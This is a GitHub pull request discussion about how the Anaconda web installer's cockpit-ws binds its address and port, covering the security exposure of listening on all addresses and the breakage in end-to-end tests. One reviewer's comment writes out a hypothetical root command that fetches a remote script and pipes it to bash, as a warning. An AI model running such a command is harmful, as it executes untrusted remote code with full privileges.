webui: when using the remote option just relax the address that cockpit-ws binds to

KKoukiou opened the pull request.

VladimirSlavik reviewed (commented):
Ha, overwriting the unit is no more! That needs a celebration...

On the other hand, does this mean that webui always allows unprotected access on http?

KKoukiou commented:
> Ha, overwriting the unit is no more! That needs a celebration...
> 
> On the other hand, does this mean that webui always allows unprotected access on http?

Nothing changes here: the webui currently only gets talked to from localhost (see webui-desktop script) and ws doesn't enforce tls for localhost anyway.
When we implement remote access (properly) we have to adjust that.

VladimirSlavik commented:
Ah, perfect. Thank you!

VladimirSlavik commented:
Actually - to make sure I understand, I'll write it here in full, so you can refute in detail just the parts that are wrong:

- Currently, the environment of the booted image (in VM) can't be accessed outside of the host.
- With this change, we always open remote access, but it doesn't matter because of the above.

The part that I don't understand is, what happens on a real machine, outside of a VM? Is it also bound to `127.0.0.*` so it can't be effectively accessed, or something?

M4rtinK commented:
/boot-iso --webui

KKoukiou commented:
> Actually - to make sure I understand, I'll write it here in full, so you can refute in detail just the parts that are wrong:
> 
>     * Currently, the environment of the booted image (in VM) can't be accessed outside of the host.

Correct.

> 
>     * With this change, we always open remote access, but it doesn't matter because of the above.

We open remote access by forwarding the http port (80) to the host 9091 port for the test VMs only.

> 
> 
> The part that I don't understand is, what happens on a real machine, outside of a VM? Is it also bound to `127.0.0.*` so it can't be effectively accessed, or something?

On a real machine (not our custom test VMs) there is not port forwarding going on, so the http port of the machine can't be accessed from outside.

VladimirSlavik commented:
Um, yes, but the port forwarding in the VM just translates guest->host, so `guest:80` becomes `host:<some port>`. So, with no port forwarding, if the image runs on a bare metal, the real machine becomes a "normal" web server on port 80, serving webui?

KKoukiou commented:
> Um, yes, but the port forwarding in the VM just translates guest->host, so `guest:80` becomes `host:<some port>`. So, with no port forwarding, if the image runs on a bare metal, the real machine becomes a "normal" web server on port 80, serving webui?

Yes, that was the case also before.

VladimirSlavik commented:
I disagree. The case before was that you had to explicitly ask for the webui to be reachable by using a boot option (or at least it was sold as such?). Now it's not.

The other lovely part is that currently webui always runs when present, even if anything else is requested (what a great choice, eh). Together, this means: When you run a webui image built after this is merged, it automatically opens a web server which anyone can visit, then they can open the console and do `cockpit.spawn("curl example.com/hacking_script | bash")`, all while being root with access to mountable local disks.

I don't think that end result is acceptable.

Given that we're not releasing this automatically, I'm willing to compromise and consider this an acceptable state while we're on the way towards something better, but please record this somehow as TODO comments and in JIRA, because I sure don't want to get publicity this way.

KKoukiou commented:
> I disagree. The case before was that you had to explicitly ask for the webui to be reachable by using a boot option (or at least it was sold as such?). Now it's not.

I think you miss the point here. Now remote webui is literally never accessible. You cant connect from a remote browser. to the webui after this PR unless you do what we do which is port forwarding on the test VM. The users have nothing to do with this.

> 
> The other lovely part is that currently webui always runs when present, even if anything else is requested (what a great choice, eh).

The has nothing to do with this commit. It's about how `webui_mode`  property and it's pre-decessor is implemented and it's actually wrong I agree. 

> Together, this means: When you run a webui image built after this is merged, it automatically opens a web server which anyone can visit, then they can open the console and do `cockpit.spawn("curl example.com/hacking_script | bash")`, all while being root with access to mountable local disks.

That's not correct. You can only access the http port from inside the VM, not outside.
> 
> I don't think that end result is acceptable.
> 
> Given that we're not releasing this automatically, I'm willing to compromise and consider this an acceptable state while we're on the way towards something better, but please record this somehow as TODO comments and in JIRA, because I sure don't want to get publicity this way. So this needs to be addressed somehow.

KKoukiou commented on ui/webui/webui-desktop:
```diff
@@ -88,7 +88,7 @@ BROWSER_HOME=$(mktemp --directory --tmpdir cockpit.desktop.XXXXXX)
 # it pretty well does not matter which port we use in our own namespace, so use standard http
 # disable /etc/cockpit/
-XDG_CONFIG_DIRS="$BROWSER_HOME" COCKPIT_SUPERUSER="pkexec" /usr/libexec/cockpit-ws -p 80 -a 127.0.0.90 --local-session=cockpit-bridge &
+XDG_CONFIG_DIRS="$BROWSER_HOME" COCKPIT_SUPERUSER="pkexec" /usr/libexec/cockpit-ws -p 80 --no-tls --local-session=cockpit-bridge &
```
@martinpitt this change here makes the cockpit-ws listen on all possible addresses right? 

Since webui-desktop is not runnign in network namespace, this is probably problematic in matters of security. I tried to put this back, but then port forwarding does not seem to work for 80 port for passing requests from the host. Any ideas?

martinpitt replied:
Ah yes, that's a good point. So you either need to support an `${ADDRESS:-127.0.0.1}` variable which you can change from the test, or the test needs to run socat or similar to forward the port. I think the former is easier.

velezd commented:
Removing webui.remote breaks end to end tests. I know that in the current state it isn't "production ready", but it is not enabled by default, so what is the benefit of removing it?

KKoukiou commented:
> Removing webui.remote breaks end to end tests. I know that in the current state it isn't "production ready", but it is not enabled by default, so what is the benefit of removing it?

The benefit of removing is to have nothing on production code which is not production ready. The e2e tests should follow similar workaround as I did for the integration tests.

velezd commented:
> > Removing webui.remote breaks end to end tests. I know that in the current state it isn't "production ready", but it is not enabled by default, so what is the benefit of removing it?
> 
> The benefit of removing is to have nothing on production code which is not production ready. The e2e tests should follow similar workaround as I did for the integration tests.

We could just say in the documentation that the remote webui enabled by the option is not secure or whatever. Current VNC access isn't much better in this regard anyway.

jstodola commented:
> > Removing webui.remote breaks end to end tests. I know that in the current state it isn't "production ready", but it is not enabled by default, so what is the benefit of removing it?
> 
> The benefit of removing is to have nothing on production code which is not production ready. The e2e tests should follow similar workaround as I did for the integration tests.

So, shouldn't this PR include such a workaround, so that e2e tests keeps running?

KKoukiou commented:
> > > Removing webui.remote breaks end to end tests. I know that in the current state it isn't "production ready", but it is not enabled by default, so what is the benefit of removing it?
> > 
> > 
> > The benefit of removing is to have nothing on production code which is not production ready. The e2e tests should follow similar workaround as I did for the integration tests.
> 
> So, shouldn't this PR include such a workaround, so that e2e tests keeps running?

As we discussed a few days ago - this last week before the deadline there is not capacity to learn the e2e tests. Happy to do that after the deadline.

VladimirSlavik reviewed (approved):
So, if I get it right, without the remote boot option, the server listens only to incoming connections from localhost. With the option present, the server is open for connections from everywhere - as it should be.

Thank you, this is very nice.

VladimirSlavik commented:
BTW, test access is still the same with this, right? I mean, this now addresses all of the feedback...

KKoukiou commented:
> BTW, test access is still the same with this, right? I mean, this now addresses all of the feedback...

The only difference that we might need to tweak in the e2e tests is the port they connect to. But that's straightforward.

M4rtinK commented:
> The only difference that we might need to tweak in the e2e tests is the port they connect to. But that's straightforward.

Is this being synchronized with @velezd so as not to cause unexpected breakage in e2e tests ?

M4rtinK commented on ui/webui/webui-desktop:
```diff
@@ -64,6 +64,12 @@ esac
 FIREFOX_THEME_DIR="/usr/share/anaconda/firefox-theme"
 FIREFOX_PROFILE_PATH="/tmp/anaconda-firefox-profile"
 THEME_ID=$2
+WEBUI_REMOTE=$3
```
This seems like some higher magic - please add a comment what it does. :)

M4rtinK replied:
Thanks! :)

M4rtinK commented on pyanaconda/ui/webui/__init__.py:
```diff
@@ -118,7 +102,7 @@ def run(self):
         proc = startProgram(["/usr/libexec/webui-desktop",
                             "/cockpit/@localhost/anaconda-webui/index.html",
-                            profile_name],
+                            profile_name, str(int(self.remote))],
```
I think it would be a good idea to add a docstring explaining whats going on here. :) (eq. that the script being called getting reacts differently on 1/0 being passed)

KKoukiou replied:
Parameters are not named and explained in the script.

M4rtinK replied:
OK, that should be good enough. :)

M4rtinK reviewed (changes requested):
Definitely looking better - but I think we need a to add some docstrings to explain whats going on, as some of the things are rather technical with significant impact.

KKoukiou commented:
> > The only difference that we might need to tweak in the e2e tests is the port they connect to. But that's straightforward.
> 
> Is this being synchronized with @velezd so as not to cause unexpected breakage in e2e tests ?



> > The only difference that we might need to tweak in the e2e tests is the port they connect to. But that's straightforward.
> 
> Is this being synchronized with @velezd so as not to cause unexpected breakage in e2e tests ?

@velezd the port the webui runs needs to be adjusted - probably in https://github.com/rhinstaller/permian/blob/0df93cfe1538257a20cef61d79f0139992e222aa/libpermian/plugins/anaconda_webui/test.py#L36

I am not familiar with that file - 8000 was never the port the webui was running in fact, so not sure what value is this.

KKoukiou commented:
https://github.com/rhinstaller/permian/blob/0df93cfe1538257a20cef61d79f0139992e222aa/libpermian/plugins/anaconda_webui/settings.ini#L11 this needs to be changed to80 once this is merged then.

KKoukiou commented:
/kickstart-test --waive webui only

M4rtinK reviewed (approved):
Looks good to me now, thanks! :)
